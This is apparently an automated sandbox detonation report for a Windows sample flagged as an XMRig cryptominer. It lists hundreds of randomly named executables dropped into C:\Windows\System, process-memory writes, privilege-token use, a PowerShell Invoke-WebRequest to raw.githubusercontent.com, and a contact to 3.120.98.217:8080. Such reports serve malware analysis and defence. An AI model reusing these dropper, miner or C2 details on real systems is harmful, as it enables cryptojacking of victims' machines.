C:\Windows\System\REQJViV.exe

C:\Windows\System\dnCuVKM.exe

C:\Windows\System\dnCuVKM.exe

C:\Windows\System\byTJvLI.exe

C:\Windows\System\byTJvLI.exe

C:\Windows\System\MmRqpbq.exe

C:\Windows\System\MmRqpbq.exe

C:\Windows\System\vMPkKfd.exe

C:\Windows\System\vMPkKfd.exe

C:\Windows\System\ujyAxZE.exe

C:\Windows\System\ujyAxZE.exe

C:\Windows\System\ELkaKHp.exe

C:\Windows\System\ELkaKHp.exe

C:\Windows\System\PZxkphv.exe

C:\Windows\System\PZxkphv.exe

C:\Windows\System\HFpqotr.exe

C:\Windows\System\HFpqotr.exe

C:\Windows\System\qiwaVhE.exe

C:\Windows\System\qiwaVhE.exe

C:\Windows\System\xSzNySZ.exe

C:\Windows\System\xSzNySZ.exe

C:\Windows\System\dUoTVUv.exe

C:\Windows\System\dUoTVUv.exe

C:\Windows\System\YvcvuDi.exe

C:\Windows\System\YvcvuDi.exe

C:\Windows\System\zWXhGcH.exe

C:\Windows\System\zWXhGcH.exe

C:\Windows\System\jfYKaQn.exe

C:\Windows\System\jfYKaQn.exe

C:\Windows\System\uBxlSnI.exe

C:\Windows\System\uBxlSnI.exe

C:\Windows\System\NGYDvmg.exe

C:\Windows\System\NGYDvmg.exe

C:\Windows\System\YBwbJKG.exe

C:\Windows\System\YBwbJKG.exe

C:\Windows\System\PRTvVPK.exe

C:\Windows\System\PRTvVPK.exe

C:\Windows\System\zCKBwkt.exe

C:\Windows\System\zCKBwkt.exe

C:\Windows\System\jvWrZIk.exe

C:\Windows\System\jvWrZIk.exe

C:\Windows\System\pWJqetU.exe

C:\Windows\System\pWJqetU.exe

C:\Windows\System\gnEMVyM.exe

C:\Windows\System\gnEMVyM.exe

C:\Windows\System\tVCEOpn.exe

C:\Windows\System\tVCEOpn.exe

C:\Windows\System\WuUTwyx.exe

C:\Windows\System\WuUTwyx.exe

C:\Windows\System\RftLUwC.exe

C:\Windows\System\RftLUwC.exe

C:\Windows\System\HPJNgIv.exe

C:\Windows\System\HPJNgIv.exe

C:\Windows\System\KSXvKaM.exe

C:\Windows\System\KSXvKaM.exe

C:\Windows\System\pNzUPdT.exe

C:\Windows\System\pNzUPdT.exe

C:\Windows\System\lcRUbbC.exe

C:\Windows\System\lcRUbbC.exe

C:\Windows\System\knqimBz.exe

C:\Windows\System\knqimBz.exe

C:\Windows\System\OafYnwi.exe

C:\Windows\System\OafYnwi.exe

C:\Windows\System\VLGhcai.exe

C:\Windows\System\VLGhcai.exe

C:\Windows\System\JxnOkZy.exe

C:\Windows\System\JxnOkZy.exe

C:\Windows\System\vqnOmfo.exe

C:\Windows\System\vqnOmfo.exe

C:\Windows\System\MorvtkS.exe

C:\Windows\System\MorvtkS.exe

C:\Windows\System\FvzfKre.exe

C:\Windows\System\FvzfKre.exe

C:\Windows\System\airzumm.exe

C:\Windows\System\airzumm.exe

C:\Windows\System\WPRgWNn.exe

C:\Windows\System\WPRgWNn.exe

C:\Windows\System\oTMOLzJ.exe

C:\Windows\System\oTMOLzJ.exe

C:\Windows\System\TjQlsBz.exe

C:\Windows\System\TjQlsBz.exe

C:\Windows\System\JAnmEXG.exe

C:\Windows\System\JAnmEXG.exe

C:\Windows\System\vNwBRAp.exe

C:\Windows\System\vNwBRAp.exe

C:\Windows\System\NtPikEk.exe

C:\Windows\System\NtPikEk.exe

C:\Windows\System\VGkIRPE.exe

C:\Windows\System\VGkIRPE.exe

C:\Windows\System\MPGrDNf.exe

C:\Windows\System\MPGrDNf.exe

C:\Windows\System\NzPCWob.exe

C:\Windows\System\NzPCWob.exe

C:\Windows\System\SGiJpSy.exe

C:\Windows\System\SGiJpSy.exe

C:\Windows\System\pyLdmdz.exe

C:\Windows\System\pyLdmdz.exe

C:\Windows\System\pVOfcwW.exe

C:\Windows\System\pVOfcwW.exe

C:\Windows\System\eNpUhCd.exe

C:\Windows\System\eNpUhCd.exe

C:\Windows\System\hdSrckg.exe

C:\Windows\System\hdSrckg.exe

C:\Windows\System\DuDQBTe.exe

C:\Windows\System\DuDQBTe.exe

C:\Windows\System\aWLkeed.exe

C:\Windows\System\aWLkeed.exe

C:\Windows\System\INAVWtL.exe

C:\Windows\System\INAVWtL.exe

C:\Windows\System\QkmeGKY.exe

C:\Windows\System\QkmeGKY.exe

C:\Windows\System\qMIqqIL.exe

C:\Windows\System\qMIqqIL.exe

C:\Windows\System\FJJpbrO.exe

C:\Windows\System\FJJpbrO.exe

C:\Windows\System\HQsGkac.exe

C:\Windows\System\HQsGkac.exe

C:\Windows\System\SVogAOo.exe

C:\Windows\System\SVogAOo.exe

C:\Windows\System\WhqVuwe.exe

C:\Windows\System\WhqVuwe.exe

C:\Windows\System\YJnVSxL.exe

C:\Windows\System\YJnVSxL.exe

C:\Windows\System\euhZcpQ.exe

C:\Windows\System\euhZcpQ.exe

C:\Windows\System\mOXPWWo.exe

C:\Windows\System\mOXPWWo.exe

C:\Windows\System\NRKOTWh.exe

C:\Windows\System\NRKOTWh.exe

C:\Windows\System\YXyTkow.exe

C:\Windows\System\YXyTkow.exe

C:\Windows\System\DGGxwEx.exe

C:\Windows\System\DGGxwEx.exe

C:\Windows\System\yDUmlZQ.exe

C:\Windows\System\yDUmlZQ.exe

C:\Windows\System\QPicoxH.exe

C:\Windows\System\QPicoxH.exe

C:\Windows\System\UBsNrYH.exe

C:\Windows\System\UBsNrYH.exe

C:\Windows\System\mwQdLQF.exe

C:\Windows\System\mwQdLQF.exe

C:\Windows\System\AORVYFH.exe

C:\Windows\System\AORVYFH.exe

C:\Windows\System\luXtrvJ.exe

C:\Windows\System\luXtrvJ.exe

C:\Windows\System\wyATByB.exe

C:\Windows\System\wyATByB.exe

C:\Windows\System\wnOusCD.exe

C:\Windows\System\wnOusCD.exe

C:\Windows\System\hSwhZIO.exe

C:\Windows\System\hSwhZIO.exe

C:\Windows\System\jTzgwhU.exe

C:\Windows\System\jTzgwhU.exe

C:\Windows\System\HTmwVRn.exe

C:\Windows\System\HTmwVRn.exe

C:\Windows\System\CswgLFB.exe

C:\Windows\System\CswgLFB.exe

C:\Windows\System\JVQCqpY.exe

C:\Windows\System\JVQCqpY.exe

C:\Windows\System\XnyZJOq.exe

C:\Windows\System\XnyZJOq.exe

C:\Windows\System\DGziqVb.exe

C:\Windows\System\DGziqVb.exe

C:\Windows\System\mBwcaIm.exe

C:\Windows\System\mBwcaIm.exe

C:\Windows\System\ueMtyCv.exe

C:\Windows\System\ueMtyCv.exe

C:\Windows\System\xQJNiYn.exe

C:\Windows\System\xQJNiYn.exe

C:\Windows\System\TewimOH.exe

C:\Windows\System\TewimOH.exe

C:\Windows\System\EnTEloT.exe

C:\Windows\System\EnTEloT.exe

C:\Windows\System\VhzvCCX.exe

C:\Windows\System\VhzvCCX.exe

C:\Windows\System\ScnRrqG.exe

C:\Windows\System\ScnRrqG.exe

C:\Windows\System\LNczDTd.exe

C:\Windows\System\LNczDTd.exe

C:\Windows\System\ASdOrWP.exe

C:\Windows\System\ASdOrWP.exe

C:\Windows\System\FyZAwkb.exe

C:\Windows\System\FyZAwkb.exe

C:\Windows\System\eISyOCc.exe

C:\Windows\System\eISyOCc.exe

C:\Windows\System\xZNvEPf.exe

C:\Windows\System\xZNvEPf.exe

C:\Windows\System\vjZdhVW.exe

C:\Windows\System\vjZdhVW.exe

C:\Windows\System\jlKlcxg.exe

C:\Windows\System\jlKlcxg.exe

C:\Windows\System\KexXIOF.exe

C:\Windows\System\KexXIOF.exe

C:\Windows\System\CoqcRAF.exe

C:\Windows\System\CoqcRAF.exe

C:\Windows\System\DYLBnHy.exe

C:\Windows\System\DYLBnHy.exe

C:\Windows\System\SWBaFjT.exe

C:\Windows\System\SWBaFjT.exe

C:\Windows\System\CjfLgoV.exe

C:\Windows\System\CjfLgoV.exe

C:\Windows\System\hOuJqkv.exe

C:\Windows\System\hOuJqkv.exe

C:\Windows\System\MJaMUBm.exe

C:\Windows\System\MJaMUBm.exe

C:\Windows\System\JikDnVm.exe

C:\Windows\System\JikDnVm.exe

C:\Windows\System\kMafmpx.exe


Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 06:49

Reported

2024-06-14 06:52

Platform

win10v2004-20240611-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 704 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\axsnuIh.exe
PID 704 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\axsnuIh.exe
PID 704 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UaZOuXE.exe
PID 704 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UaZOuXE.exe
PID 704 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VtRMRez.exe
PID 704 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\VtRMRez.exe
PID 704 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\YAEyqJg.exe
PID 704 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\YAEyqJg.exe
PID 704 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kADKegI.exe
PID 704 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\kADKegI.exe
PID 704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PcPaVyj.exe
PID 704 wrote to memory of 432 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\PcPaVyj.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\OVzTxya.exe
PID 704 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\OVzTxya.exe
PID 704 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qkwCFxX.exe
PID 704 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\qkwCFxX.exe
PID 704 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SeODjOb.exe
PID 704 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\SeODjOb.exe
PID 704 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UdnlBmh.exe
PID 704 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe C:\Windows\System\UdnlBmh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\aa85b7a9b9f3a5ede3b61e1ab1d89380_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\yIZazcv.exe

C:\Windows\System\yIZazcv.exe

C:\Windows\System\CYUdYnc.exe

C:\Windows\System\CYUdYnc.exe

C:\Windows\System\TQcbLMc.exe

C:\Windows\System\TQcbLMc.exe

C:\Windows\System\kLXCIeP.exe

C:\Windows\System\kLXCIeP.exe

C:\Windows\System\fNcMtrc.exe

C:\Windows\System\fNcMtrc.exe

C:\Windows\System\XKUjITx.exe

C:\Windows\System\XKUjITx.exe

C:\Windows\System\zYdUkel.exe

C:\Windows\System\zYdUkel.exe

C:\Windows\System\tPjlIJi.exe

C:\Windows\System\tPjlIJi.exe

C:\Windows\System\OhnaJxP.exe

C:\Windows\System\OhnaJxP.exe

C:\Windows\System\TXTSkkp.exe

C:\Windows\System\TXTSkkp.exe

C:\Windows\System\jqYtZpZ.exe

C:\Windows\System\jqYtZpZ.exe

C:\Windows\System\gmvSUXE.exe

C:\Windows\System\gmvSUXE.exe

C:\Windows\System\yLufQYY.exe

C:\Windows\System\yLufQYY.exe

C:\Windows\System\OIxPTzc.exe

C:\Windows\System\OIxPTzc.exe

C:\Windows\System\SzOyTir.exe

C:\Windows\System\SzOyTir.exe

C:\Windows\System\aEHTTKv.exe

C:\Windows\System\aEHTTKv.exe

C:\Windows\System\eQaVkak.exe

C:\Windows\System\eQaVkak.exe

C:\Windows\System\xUNFtGr.exe

C:\Windows\System\xUNFtGr.exe

C:\Windows\System\zcZdTMt.exe

C:\Windows\System\zcZdTMt.exe

C:\Windows\System\ydjkSTR.exe

C:\Windows\System\ydjkSTR.exe

C:\Windows\System\EpOpUMy.exe

C:\Windows\System\EpOpUMy.exe

C:\Windows\System\FXvsZXa.exe

C:\Windows\System\FXvsZXa.exe

C:\Windows\System\iqfiHLE.exe

C:\Windows\System\iqfiHLE.exe

C:\Windows\System\xhytoCM.exe

C:\Windows\System\xhytoCM.exe

C:\Windows\System\cenTRrG.exe

C:\Windows\System\cenTRrG.exe

C:\Windows\System\QIzzBuv.exe

C:\Windows\System\QIzzBuv.exe

C:\Windows\System\xxVlMii.exe

C:\Windows\System\xxVlMii.exe

C:\Windows\System\bMcSYpm.exe

C:\Windows\System\bMcSYpm.exe

C:\Windows\System\mzyXFFO.exe

C:\Windows\System\mzyXFFO.exe

C:\Windows\System\sITxQll.exe

C:\Windows\System\sITxQll.exe

C:\Windows\System\xPKvxUu.exe

C:\Windows\System\xPKvxUu.exe

C:\Windows\System\BJBjTBQ.exe

C:\Windows\System\BJBjTBQ.exe

C:\Windows\System\dMFIcBj.exe

C:\Windows\System\dMFIcBj.exe

C:\Windows\System\OqhxPit.exe

C:\Windows\System\OqhxPit.exe

C:\Windows\System\rFoFgTv.exe

C:\Windows\System\rFoFgTv.exe

C:\Windows\System\gOURXIU.exe

C:\Windows\System\gOURXIU.exe

C:\Windows\System\nfcrQOW.exe

C:\Windows\System\nfcrQOW.exe

C:\Windows\System\XQXsYlC.exe

C:\Windows\System\XQXsYlC.exe

C:\Windows\System\VjUYBfI.exe

C:\Windows\System\VjUYBfI.exe

C:\Windows\System\QTiZMLS.exe

C:\Windows\System\QTiZMLS.exe

C:\Windows\System\zxOQWmd.exe

C:\Windows\System\zxOQWmd.exe

C:\Windows\System\bbCPmKz.exe

C:\Windows\System\bbCPmKz.exe

C:\Windows\System\AIEzuOg.exe

C:\Windows\System\AIEzuOg.exe

C:\Windows\System\AzFFxSZ.exe

C:\Windows\System\AzFFxSZ.exe

C:\Windows\System\LCqhUBc.exe

C:\Windows\System\LCqhUBc.exe

C:\Windows\System\zYoVpLl.exe

C:\Windows\System\zYoVpLl.exe

C:\Windows\System\ARwKKFg.exe

C:\Windows\System\ARwKKFg.exe

C:\Windows\System\tpFwLvt.exe

C:\Windows\System\tpFwLvt.exe

C:\Windows\System\xbRBxMg.exe

C:\Windows\System\xbRBxMg.exe

C:\Windows\System\iFpAYGo.exe

C:\Windows\System\iFpAYGo.exe

C:\Windows\System\gyYUwiQ.exe

C:\Windows\System\gyYUwiQ.exe

C:\Windows\System\GoAecHX.exe

C:\Windows\System\GoAecHX.exe

C:\Windows\System\ntNWQvl.exe

C:\Windows\System\ntNWQvl.exe

C:\Windows\System\LQtBVol.exe

C:\Windows\System\LQtBVol.exe

C:\Windows\System\NEGcUJw.exe

C:\Windows\System\NEGcUJw.exe

C:\Windows\System\VlvWwzL.exe

C:\Windows\System\VlvWwzL.exe

C:\Windows\System\ugeEHiN.exe

C:\Windows\System\ugeEHiN.exe

C:\Windows\System\WyEDsgy.exe

C:\Windows\System\WyEDsgy.exe

C:\Windows\System\nxythLk.exe

C:\Windows\System\nxythLk.exe

C:\Windows\System\GzZjjQf.exe

C:\Windows\System\GzZjjQf.exe

C:\Windows\System\YkAosuJ.exe

C:\Windows\System\YkAosuJ.exe

C:\Windows\System\spRKtLW.exe

C:\Windows\System\spRKtLW.exe

C:\Windows\System\SHCwxYG.exe

C:\Windows\System\SHCwxYG.exe

C:\Windows\System\DyXdFtb.exe

C:\Windows\System\DyXdFtb.exe

C:\Windows\System\hWRndZC.exe

C:\Windows\System\hWRndZC.exe

C:\Windows\System\rvSFEHb.exe

C:\Windows\System\rvSFEHb.exe

C:\Windows\System\dKcsIbF.exe

C:\Windows\System\dKcsIbF.exe

C:\Windows\System\yoDdaBF.exe

C:\Windows\System\yoDdaBF.exe

C:\Windows\System\gVGsrVD.exe

C:\Windows\System\gVGsrVD.exe

C:\Windows\System\rSvMexc.exe

C:\Windows\System\rSvMexc.exe

C:\Windows\System\jTWLJmQ.exe

C:\Windows\System\jTWLJmQ.exe

C:\Windows\System\gqRCDCT.exe

C:\Windows\System\gqRCDCT.exe

C:\Windows\System\bgeepCG.exe

C:\Windows\System\bgeepCG.exe

C:\Windows\System\UAUyLMg.exe

C:\Windows\System\UAUyLMg.exe

C:\Windows\System\aNtVHqU.exe

C:\Windows\System\aNtVHqU.exe

C:\Windows\System\xHLlqMF.exe

C:\Windows\System\xHLlqMF.exe

C:\Windows\System\nTnxIHO.exe

C:\Windows\System\nTnxIHO.exe

C:\Windows\System\clXzjJM.exe

C:\Windows\System\clXzjJM.exe

C:\Windows\System\pHUDuxk.exe

C:\Windows\System\pHUDuxk.exe

C:\Windows\System\dyFmtcp.exe

C:\Windows\System\dyFmtcp.exe

C:\Windows\System\QKGvwXO.exe

C:\Windows\System\QKGvwXO.exe

C:\Windows\System\zgWidTA.exe

C:\Windows\System\zgWidTA.exe

C:\Windows\System\RuAfTmb.exe

C:\Windows\System\RuAfTmb.exe

C:\Windows\System\xRfrIuy.exe

C:\Windows\System\xRfrIuy.exe

C:\Windows\System\ZLBPKso.exe

C:\Windows\System\ZLBPKso.exe

C:\Windows\System\fIktPfr.exe

C:\Windows\System\fIktPfr.exe

C:\Windows\System\BAFWFLL.exe

C:\Windows\System\BAFWFLL.exe

C:\Windows\System\dTPPNTW.exe

C:\Windows\System\dTPPNTW.exe

C:\Windows\System\BWUMvYi.exe

C:\Windows\System\BWUMvYi.exe

C:\Windows\System\PanmFYN.exe

C:\Windows\System\PanmFYN.exe

C:\Windows\System\jGYwoKd.exe

C:\Windows\System\jGYwoKd.exe

C:\Windows\System\NWLVtQs.exe

C:\Windows\System\NWLVtQs.exe

C:\Windows\System\eRcMCjk.exe

C:\Windows\System\eRcMCjk.exe

C:\Windows\System\cdddExH.exe

C:\Windows\System\cdddExH.exe

C:\Windows\System\bJVINTz.exe

C:\Windows\System\bJVINTz.exe

C:\Windows\System\kxxhPax.exe

C:\Windows\System\kxxhPax.exe

C:\Windows\System\jfkJDwH.exe

C:\Windows\System\jfkJDwH.exe

C:\Windows\System\AvkZhxW.exe

C:\Windows\System\AvkZhxW.exe

C:\Windows\System\fcAZZzk.exe

C:\Windows\System\fcAZZzk.exe

C:\Windows\System\XKuabfh.exe

C:\Windows\System\XKuabfh.exe

C:\Windows\System\HgJmNRR.exe

C:\Windows\System\HgJmNRR.exe

C:\Windows\System\vFVSPxj.exe

C:\Windows\System\vFVSPxj.exe

C:\Windows\System\dvGbzad.exe

C:\Windows\System\dvGbzad.exe

C:\Windows\System\aqIxWBf.exe

C:\Windows\System\aqIxWBf.exe

C:\Windows\System\yzasMqb.exe

C:\Windows\System\yzasMqb.exe

C:\Windows\System\SMtetHy.exe

C:\Windows\System\SMtetHy.exe

C:\Windows\System\rtOzuSh.exe

C:\Windows\System\rtOzuSh.exe

C:\Windows\System\BNCtnNL.exe

C:\Windows\System\BNCtnNL.exe

C:\Windows\System\IhYjdrc.exe

C:\Windows\System\IhYjdrc.exe

C:\Windows\System\bVgvwgk.exe

C:\Windows\System\bVgvwgk.exe

C:\Windows\System\hsswgpU.exe

C:\Windows\System\hsswgpU.exe

C:\Windows\System\OBEMHwt.exe

C:\Windows\System\OBEMHwt.exe

C:\Windows\System\aZFOhTb.exe

C:\Windows\System\aZFOhTb.exe

C:\Windows\System\lvYaCir.exe

C:\Windows\System\lvYaCir.exe

C:\Windows\System\dYulDBG.exe

C:\Windows\System\dYulDBG.exe

C:\Windows\System\usJHlqe.exe

C:\Windows\System\usJHlqe.exe

C:\Windows\System\errTKjr.exe

C:\Windows\System\errTKjr.exe

C:\Windows\System\QrPlIln.exe

C:\Windows\System\QrPlIln.exe

C:\Windows\System\vXoHykI.exe

C:\Windows\System\vXoHykI.exe

C:\Windows\System\IUwTFZl.exe

C:\Windows\System\IUwTFZl.exe

C:\Windows\System\JrLvUcl.exe

C:\Windows\System\JrLvUcl.exe

C:\Windows\System\BmvhOcx.exe

C:\Windows\System\BmvhOcx.exe

C:\Windows\System\GqwwLOl.exe

C:\Windows\System\GqwwLOl.exe

C:\Windows\System\djEJWza.exe

C:\Windows\System\djEJWza.exe

C:\Windows\System\NOaHjET.exe

C:\Windows\System\NOaHjET.exe

C:\Windows\System\ebsjFoN.exe

C:\Windows\System\ebsjFoN.exe

C:\Windows\System\ynooyvS.exe

C:\Windows\System\ynooyvS.exe

C:\Windows\System\PRzBFTB.exe

C:\Windows\System\PRzBFTB.exe

C:\Windows\System\dAmHBpG.exe

C:\Windows\System\dAmHBpG.exe

C:\Windows\System\IzmTqia.exe

C:\Windows\System\IzmTqia.exe

C:\Windows\System\bQCTfLb.exe

C:\Windows\System\bQCTfLb.exe

C:\Windows\System\GzvVZBS.exe

C:\Windows\System\GzvVZBS.exe

C:\Windows\System\JfdIPiC.exe

C:\Windows\System\JfdIPiC.exe

C:\Windows\System\csqtFOL.exe

C:\Windows\System\csqtFOL.exe

C:\Windows\System\WgLVweJ.exe

C:\Windows\System\WgLVweJ.exe

C:\Windows\System\BPRYoDY.exe

C:\Windows\System\BPRYoDY.exe

C:\Windows\System\XADbdbF.exe

C:\Windows\System\XADbdbF.exe

C:\Windows\System\aDHLyOD.exe

C:\Windows\System\aDHLyOD.exe

C:\Windows\System\kMTPKYs.exe

C:\Windows\System\kMTPKYs.exe

C:\Windows\System\TJhceHf.exe

C:\Windows\System\TJhceHf.exe

C:\Windows\System\NoOnjlY.exe

C:\Windows\System\NoOnjlY.exe

C:\Windows\System\yrrcgKa.exe

C:\Windows\System\yrrcgKa.exe

C:\Windows\System\CsBOokZ.exe

C:\Windows\System\CsBOokZ.exe

C:\Windows\System\ABNxquF.exe

C:\Windows\System\ABNxquF.exe

C:\Windows\System\frbQwFp.exe

C:\Windows\System\frbQwFp.exe

C:\Windows\System\jjviJIp.exe

C:\Windows\System\jjviJIp.exe

C:\Windows\System\ALLfqjQ.exe

C:\Windows\System\ALLfqjQ.exe

C:\Windows\System\eEvhqoo.exe

C:\Windows\System\eEvhqoo.exe

C:\Windows\System\SpiIESo.exe

C:\Windows\System\SpiIESo.exe

C:\Windows\System\dXjaiIO.exe

C:\Windows\System\dXjaiIO.exe

C:\Windows\System\kSNLUNo.exe

C:\Windows\System\kSNLUNo.exe

C:\Windows\System\WUplhEW.exe

C:\Windows\System\WUplhEW.exe

C:\Windows\System\ukGlzCK.exe

C:\Windows\System\ukGlzCK.exe

C:\Windows\System\MyxuVUS.exe

C:\Windows\System\MyxuVUS.exe

C:\Windows\System\YEnCOog.exe

C:\Windows\System\YEnCOog.exe

C:\Windows\System\cHjFiNn.exe

C:\Windows\System\cHjFiNn.exe

C:\Windows\System\Losnrhq.exe

C:\Windows\System\Losnrhq.exe

C:\Windows\System\LcAQIIf.exe

C:\Windows\System\LcAQIIf.exe

C:\Windows\System\wIeumot.exe

C:\Windows\System\wIeumot.exe

C:\Windows\System\DQMeSlJ.exe

C:\Windows\System\DQMeSlJ.exe

C:\Windows\System\gUsoPus.exe

C:\Windows\System\gUsoPus.exe

C:\Windows\System\SxDuGTW.exe

C:\Windows\System\SxDuGTW.exe

C:\Windows\System\zizxNUB.exe

C:\Windows\System\zizxNUB.exe

C:\Windows\System\MtGiGGH.exe

C:\Windows\System\MtGiGGH.exe

C:\Windows\System\YvjSCyR.exe

C:\Windows\System\YvjSCyR.exe

C:\Windows\System\cRPqeMK.exe

C:\Windows\System\cRPqeMK.exe

C:\Windows\System\yYSSXac.exe

C:\Windows\System\yYSSXac.exe

C:\Windows\System\WQRbaCi.exe

C:\Windows\System\WQRbaCi.exe

C:\Windows\System\AIKLJLy.exe

C:\Windows\System\AIKLJLy.exe

C:\Windows\System\QFQPaIK.exe

C:\Windows\System\QFQPaIK.exe

C:\Windows\System\OltqlyD.exe

C:\Windows\System\OltqlyD.exe

C:\Windows\System\FdKPGwf.exe

C:\Windows\System\FdKPGwf.exe

C:\Windows\System\MKQulQH.exe

C:\Windows\System\MKQulQH.exe

C:\Windows\System\PPXqdzs.exe

C:\Windows\System\PPXqdzs.exe

C:\Windows\System\fQlDGXL.exe

C:\Windows\System\fQlDGXL.exe

C:\Windows\System\LJdFbYC.exe

C:\Windows\System\LJdFbYC.exe

C:\Windows\System\gfecfNT.exe

C:\Windows\System\gfecfNT.exe

C:\Windows\System\TbDzoFW.exe

C:\Windows\System\TbDzoFW.exe

C:\Windows\System\EXIBZpr.exe

C:\Windows\System\EXIBZpr.exe

C:\Windows\System\bkKaFIM.exe

C:\Windows\System\bkKaFIM.exe

C:\Windows\System\umQHMlR.exe

C:\Windows\System\umQHMlR.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
DE 3.120.98.217:8080 tcp

Files
